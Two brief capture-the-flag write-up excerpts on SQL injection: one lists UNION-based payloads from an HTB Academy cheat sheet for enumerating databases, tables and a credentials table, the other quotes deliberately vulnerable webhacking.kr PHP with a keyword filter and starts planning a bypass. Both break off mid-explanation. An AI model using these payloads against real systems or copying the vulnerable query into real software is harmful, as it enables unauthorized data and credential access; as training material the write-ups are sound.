Sql Injection

A challenge about SLQi that uses Union injection technique. What is convenient about this challenge is it shows the query that is used to pull the data from the database. I used these SQL injection cheat sheet that is from the SQLi fundamental module from the HTB academy: cn' UNION select 1,database(),2,3-- - Current database name cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- - List all databases cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- - List all tables in a specific database cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- - List all columns in a specific table Steps I took based on the cheat sheet from the HTB Academy: ...

This is a challenge from webhacking.kr. As the name of the website suggests, it is about SQL injection. You can check the source code of the page: <?php if($_GET['no']){ $db = dbconnect(); if(preg_match("/ |\/|\(|\)|\||&|select|from|0x/i",$_GET['no'])) exit("no hack"); $result = mysqli_fetch_array(mysqli_query($db,"select id from chall18 where id='guest' and no=$_GET[no]")); // admin's no = 2 if($result['id']=="guest") echo "hi guest"; if($result['id']=="admin"){ solve(18); echo "hi admin!"; } } ?> Our goal seems to be creating a payload that would make the id value admin and also make the no value 2. So, let’s assume that there is no filter so we can enter anything as a payload. When we enter 2 as our input, you will see something like this: ...